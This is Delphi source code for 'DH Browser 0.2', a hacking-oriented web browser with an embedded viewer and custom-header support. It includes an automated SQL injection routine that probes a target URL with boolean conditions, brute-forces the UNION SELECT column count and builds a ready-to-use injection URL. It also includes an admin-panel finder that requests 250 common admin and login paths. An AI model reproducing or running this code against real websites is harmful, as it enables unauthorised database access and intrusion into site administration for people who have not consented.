// DH Browser 0.2
// (C) Doddy Hackman 2013
// Credits :
// Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242
// FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143
// Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm
unit programa;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, sSkinManager, StdCtrls, sButton, sEdit, OleCtrls, SHDocVw, sMemo,
sListBox, sGroupBox, sLabel, sCheckBox, ComCtrls, sStatusBar, acPNG,
ExtCtrls, mshtml, Menus, PerlRegEx, IdBaseComponent, IdComponent,
IdTCPConnection, IdTCPClient, IdHTTP, acProgressBar;
type
TForm2 = class(TForm)
sSkinManager1: TsSkinManager;
sGroupBox1: TsGroupBox;
sEdit1: TsEdit;
sButton1: TsButton;
sGroupBox2: TsGroupBox;
sMemo1: TsMemo;
sCheckBox1: TsCheckBox;
sGroupBox3: TsGroupBox;
sStatusBar1: TsStatusBar;
WebBrowser1: TWebBrowser;
sGroupBox4: TsGroupBox;
sButton2: TsButton;
sButton3: TsButton;
sGroupBox5: TsGroupBox;
sButton4: TsButton;
sLabel1: TsLabel;
Image1: TImage;
sMemo2: TsMemo;
PopupMenu1: TPopupMenu;
S1: TMenuItem;
S2: TMenuItem;
IdHTTP1: TIdHTTP;
PerlRegEx1: TPerlRegEx;
FindDialog1: TFindDialog;
sProgressBar1: TsProgressBar;
procedure sButton1Click(Sender: TObject);
procedure S1Click(Sender: TObject);
procedure S2Click(Sender: TObject);
procedure sButton3Click(Sender: TObject);
procedure sButton2Click(Sender: TObject);
procedure sButton4Click(Sender: TObject);
procedure FindDialog1Find(Sender: TObject);
procedure FormClose(Sender: TObject; var Action: TCloseAction);
procedure WebBrowser1ProgressChange(ASender: TObject;
Progress, ProgressMax: Integer);
procedure WebBrowser1DownloadComplete(Sender: TObject);
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form2: TForm2;
implementation
{$R *.dfm}
procedure TForm2.FindDialog1Find(Sender: TObject);
// FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143
var
aca: PChar;
aca2: PChar;
acatoy: PChar;
acatoy2: Word;
begin
With Sender as TFindDialog do
begin
GetMem(aca2, Length(FindText) + 1);
StrPCopy(aca2, FindText);
acatoy2 := sMemo2.GetTextLen + 1;
GetMem(aca, acatoy2);
sMemo2.GetTextBuf(aca, acatoy2);
acatoy := aca + sMemo2.SelStart + sMemo2.SelLength;
acatoy := StrPos(acatoy, aca2);
if not(acatoy = NIL) then
begin
sMemo2.SelStart := acatoy - aca;
sMemo2.SelLength := Length(FindText);
end;
sMemo2.SetFocus;
end;
end;
procedure TForm2.FormClose(Sender: TObject; var Action: TCloseAction);
begin
Application.Terminate;
end;
procedure TForm2.FormCreate(Sender: TObject);
begin
sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data';
sSkinManager1.SkinName := 'tv-b';
sSkinManager1.Active := True;
end;
procedure TForm2.S1Click(Sender: TObject);
begin
WebBrowser1.Visible := false;
sMemo2.Visible := True;
end;
procedure TForm2.S2Click(Sender: TObject);
begin
WebBrowser1.Visible := True;
sMemo2.Visible := false;
end;
procedure TForm2.sButton1Click(Sender: TObject);
// Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242
var
cabeceras: OLEVariant;
uno: OLEVariant;
dos: OLEVariant;
tres: OLEVariant;
begin
uno := navNoReadFromCache or navNoWriteToCache;
dos := '';
tres := '';
if (sCheckBox1.Checked) then
begin
cabeceras := sMemo1.Text;
WebBrowser1.Navigate(sEdit1.Text, uno, dos, tres, cabeceras);
end
else
begin
cabeceras := '';
WebBrowser1.Navigate(sEdit1.Text, uno, dos, tres, cabeceras);
end;
end;
procedure TForm2.sButton2Click(Sender: TObject);
var
pass1: string;
pass2: string;
code: string;
urltest: string;
urlgen: string;
full: string;
codedos: string;
i: Integer;
begin
sStatusBar1.Panels[0].Text := '[+] SQLI Scanning ...';
Form2.sStatusBar1.Update;
pass1 := '+';
pass2 := '--';
urltest := 'concat(0x4b30425241,1,0x4b30425241)';
sStatusBar1.Panels[0].Text := '[+] Checking ...';
Form2.sStatusBar1.Update;
code := IdHTTP1.Get
(sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=1' + pass2);
codedos := IdHTTP1.Get
(sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass2);
if not(code = codedos) then
begin
sStatusBar1.Panels[0].Text := '[+] Finding columns number';
Form2.sStatusBar1.Update;
urltest := '1' + pass1 + 'and' + pass1 + '1=0' + pass1 + 'union' + pass1 +
'select' + pass1 + 'concat(0x4b30425241,1,0x4b30425241)';
urlgen := '1';
for i := 2 to 36 do
begin
sStatusBar1.Panels[0].Text := '[+] Columns Length : ' + IntToStr(i);
Form2.sStatusBar1.Update;
urltest := urltest + ',concat(0x4b30425241,' + IntToStr(i)
+ ',0x4b30425241)';
urlgen := urlgen + ',' + IntToStr(i);
code := IdHTTP1.Get(sEdit1.Text + urltest + pass2);
PerlRegEx1.Regex := 'K0BRA(.*?)K0BRA';
PerlRegEx1.Subject := code;
if PerlRegEx1.Match then
begin
urlgen := StringReplace(urlgen, PerlRegEx1.SubExpressions[1],
'hackman', []);
full := sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass1 +
'union' + pass1 + 'select' + pass1 + urlgen;
sEdit1.Text := full;
Abort;
end;
end;
end;
sStatusBar1.Panels[0].Text := '[+] Done';
Form2.sStatusBar1.Update;
end;
procedure TForm2.sButton3Click(Sender: TObject);
const
paginas: array [1 .. 250] of string = ('admin/admin.asp', 'admin/login.asp',
'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx',
'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx',
'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp',
'asp/admin/admin.aspx', 'asp/admin/webmaster.asp',
'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx',
'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp',
'login/index.asp', 'login/index.aspx', 'login/login.asp',
'login/login.aspx', 'login/admin.asp', 'login/admin.aspx',
'administracion/index.asp', 'administracion/index.aspx',
'administracion/login.asp', 'administracion/login.aspx',
'administracion/webmaster.asp', 'administracion/webmaster.aspx',
'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/',
'admin/admin.php', 'admin/index.php', 'admin/login.php',
'admin/system.php', 'admin/ingresar.php', 'admin/administrador.php',
'admin/default.php', 'administracion/', 'administracion/index.php',
'administracion/login.php', 'administracion/ingresar.php',
'administracion/admin.php', 'administration/', 'administration/index.php',
'administration/login.php', 'administrator/index.php',
'administrator/login.php', 'administrator/system.php', 'system/',
'system/login.php', 'admin.php', 'login.php', 'administrador.php',
'administration.php', 'administrator.php', 'admin1.html', 'admin1.php',
'admin2.php', 'admin2.html', 'yonetim.php', 'yonetim.html', 'yonetici.php',
'yonetici.html', 'adm/', 'admin/account.php', 'admin/account.html',
'admin/index.html', 'admin/login.html', 'admin/home.php',
'admin/controlpanel.html', 'admin/controlpanel.php', 'admin.html',
'admin/cp.php', 'admin/cp.html', 'cp.php', 'cp.html', 'administrator/',
'administrator/index.html', 'administrator/login.html',
'administrator/account.html', 'administrator/account.php',
'administrator.html', 'login.html', 'modelsearch/login.php',
'moderator.php', 'moderator.html', 'moderator/login.php',
'moderator/login.html', 'moderator/admin.php', 'moderator/admin.html',
'moderator/', 'account.php', 'account.html', 'controlpanel/',
'controlpanel.php', 'controlpanel.html', 'admincontrol.php',
'admincontrol.html', 'adminpanel.php', 'adminpanel.html', 'admin1.asp',
'admin2.asp', 'yonetim.asp', 'yonetici.asp', 'admin/account.asp',
'admin/home.asp', 'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp',
'administrator/index.asp', 'administrator/login.asp',
'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp',
'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp',
'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp',
'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html',
'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/',
'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php',
'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp',
'Server/', 'wpadmin/', 'administr8.php', 'administr8.html', 'administr8/',
'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp',
'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp',
'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/',
'useradmin/', 'sysadmins/', 'admin1/', 'systemadministration/',
'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/',
'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/',
'sysadmin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/',
'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/',
'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/',
'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/',
'login-redirect/', 'sublogin/', 'wplogin/', 'login1/', 'dirlogin/',
'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/',
'loginus/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/',
'phppgadmin/', 'pureadmin/', 'sqladmin/', 'radmind/', 'openvpnadmin/',
'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/',
'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/',
'vmailadmin/', 'Indy_admin/', 'ccp14admin/', 'irc-macadmin/',
'banneradmin/', 'sshadmin/', 'phpldapadmin/', 'macadmin/',
'administratoraccounts/', 'admin4_account/', 'admin4_colon/', 'radmind1/',
'SuperAdmin/', 'AdminTools/', 'cmsadmin/', 'SysAdmin2/', 'globes_admin/',
'cadmins/', 'phpSQLiteAdmin/', 'navSiteAdmin/', 'server_admin_small/',
'logo_sysadmin/', 'server/', 'database_administration/', 'power_user/',
'system_administration/', 'ss_vms_admin_sm/');
var
IdHTTP: TIdHTTP;
i: Integer;
control: Integer;
begin
control := 0;
sStatusBar1.Panels[0].Text := '[+] Finding Panel ....';
Form2.sStatusBar1.Update;
IdHTTP := TIdHTTP.Create(nil);
for i := Low(paginas) to High(paginas) do
if (control = 1) then
begin
Abort;
end
else
begin
try
sStatusBar1.Panels[0].Text := '[+] Testing : ' + paginas[i];
Form2.sStatusBar1.Update;
IdHTTP.Get(sEdit1.Text + '/' + paginas[i]);
if IdHTTP.ResponseCode = 200 then
begin
sStatusBar1.Panels[0].Text := '[+] Done';
Form2.sStatusBar1.Update;
sEdit1.Text := sEdit1.Text + '/' + paginas[i];
control := 1;
end;
except
on E: EIdHttpProtocolException do
;
on E: Exception do
;
end;
end;
sStatusBar1.Panels[0].Text := '[+] Done';
Form2.sStatusBar1.Update;
end;
procedure TForm2.sButton4Click(Sender: TObject);
begin
FindDialog1.Execute;
end;
procedure TForm2.WebBrowser1DownloadComplete(Sender: TObject);
var
buscador: IHTMLElement;
begin
sProgressBar1.Position := 0;
// Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm
begin
try
begin
sMemo2.Clear;
buscador := (WebBrowser1.Document AS IHTMLDocument2).body;
while not(buscador.parentElement = nil) do
begin
buscador := buscador.parentElement;
end;
sMemo2.Lines.Add(buscador.outerHTML);
end;
except
// ??
end;
end;
end;
procedure TForm2.WebBrowser1ProgressChange(ASender: TObject;
Progress, ProgressMax: Integer);
begin
sProgressBar1.Max := ProgressMax;
sProgressBar1.Position := Progress;
end;
end.
// The End ?